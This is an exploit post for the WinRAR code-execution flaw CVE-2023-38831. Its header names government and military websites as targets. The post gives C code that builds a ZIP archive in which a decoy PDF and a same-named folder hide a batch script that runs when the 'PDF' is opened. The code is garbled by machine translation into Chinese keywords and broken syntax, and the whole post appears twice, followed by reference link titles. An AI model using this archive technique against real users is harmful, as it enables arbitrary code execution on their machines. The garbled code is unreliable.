##########
#利用标题: Exploit Winrar版本6.22漏洞CVE-2023-38831#
##
#作者: e1.coders#
##
#联系: e1.coders [at]邮件[dot] ru#
##
#安全风险:高#
##
#描述:所有目标的政府军事网站#
##
##########
##
#expl0its:#
#include stdio.h
#include stdlib.h
#include string.h
#include'zip.h'
#define pdf_file'document.pdf'
#define folder_name'document.pdf \\'
#define script_file'script.bat'
#define zip_file'exploit.zip'
int main(void){
zipfile zf=zipopen(zip_file,append_status_create);
如果(zf==null){
printf('错误打开zip文件\ n');
返回-1;
}
zip_fileinfo Zfi;
memset(ZFI,0,sizeof(ZFI));
if(zipopennewfileinzip(zf,pdf_file,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将pdf文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
文件*fp=fopen(pdf_file,'rb');
如果(fp==null){
printf('错误打开PDF文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
char缓冲区[1024];
int bytes_read;
while(((bytes_read=fread(buffer,1,sizeof(buffer),fp),fp))0){
if(zipwriteinfileinzip(zf,buffer,bytes_read)0){
printf('错误将pdf文件写入zip文件\ n');
fclose(fp);
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
}
fclose(fp);
Zipclosefileinzip(ZF);
if(zipopennewfileinzip(zf,folder_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将文件夹添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
char script_name [256];
sprintf(script_name,'%s%s',folder_name,script_file);
if(zipopennewfileinzip(zf,script_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将脚本文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
char script_content []='@echo off \ nstart cmd /c \'echo,您已被cve-2023-38831暂停\'\ n';
if(zipwriteinfileinzip(zf,script_content,strlen(script_content))0){
printf('将脚本文件写入zip文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
zipclose(ZF,null);
printf('zip文件成功创建\ n');
返回0;
}
nvd.nist.gov
nvd.nist.gov
github.com
www.logpoint.com
news.ycombinator.com
https://hdce.medium.com/cve-2023-38831-winrar- Zero-Zero-Zero-Zero-day-poses-new-fisks-for-traders-684911befad2
#利用标题: Exploit Winrar版本6.22漏洞CVE-2023-38831#
##
#作者: e1.coders#
##
#联系: e1.coders [at]邮件[dot] ru#
##
#安全风险:高#
##
#描述:所有目标的政府军事网站#
##
##########
##
#expl0its:#
#include stdio.h
#include stdlib.h
#include string.h
#include'zip.h'
#define pdf_file'document.pdf'
#define folder_name'document.pdf \\'
#define script_file'script.bat'
#define zip_file'exploit.zip'
int main(void){
zipfile zf=zipopen(zip_file,append_status_create);
如果(zf==null){
printf('错误打开zip文件\ n');
返回-1;
}
zip_fileinfo Zfi;
memset(ZFI,0,sizeof(ZFI));
if(zipopennewfileinzip(zf,pdf_file,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将pdf文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
文件*fp=fopen(pdf_file,'rb');
如果(fp==null){
printf('错误打开PDF文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
char缓冲区[1024];
int bytes_read;
while(((bytes_read=fread(buffer,1,sizeof(buffer),fp),fp))0){
if(zipwriteinfileinzip(zf,buffer,bytes_read)0){
printf('错误将pdf文件写入zip文件\ n');
fclose(fp);
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
}
fclose(fp);
Zipclosefileinzip(ZF);
if(zipopennewfileinzip(zf,folder_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将文件夹添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
char script_name [256];
sprintf(script_name,'%s%s',folder_name,script_file);
if(zipopennewfileinzip(zf,script_name,zfi,null,0,null,0,null,null,z_deflated,z_default_compression)!=zip_ok){
printf('错误将脚本文件添加到zip文件\ n');
zipclose(ZF,null);
返回-1;
}
char script_content []='@echo off \ nstart cmd /c \'echo,您已被cve-2023-38831暂停\'\ n';
if(zipwriteinfileinzip(zf,script_content,strlen(script_content))0){
printf('将脚本文件写入zip文件\ n');
Zipclosefileinzip(ZF);
zipclose(ZF,null);
返回-1;
}
Zipclosefileinzip(ZF);
zipclose(ZF,null);
printf('zip文件成功创建\ n');
返回0;
}
NVD - cve-2023-38831
nvd.nist.gov
NVD - cve-2023-38831
nvd.nist.gov
GitHub - HDCE-inc/CVE-2023-38831: CVE-2023-38831 PoC (Proof Of Concept)
CVE-2023-38831 PoC (Proof Of Concept). Contribute to HDCE-inc/CVE-2023-38831 development by creating an account on GitHub.
github.com
CVE-2023-38831 : RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user
CVE-2023-38831 : RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs
www.cvedetails.com
CVE-2023-38831: WinRAR - Decompression or Arbitrary Code Execution
Discover more about vulnerability CVE-2023-38831. Do you use WinRAR for ZIP files? If so you could be vulnerable. Read more.
www.logpoint.com
WinRAR zero-day exploited since April to hack trading accounts | Hacker News
news.ycombinator.com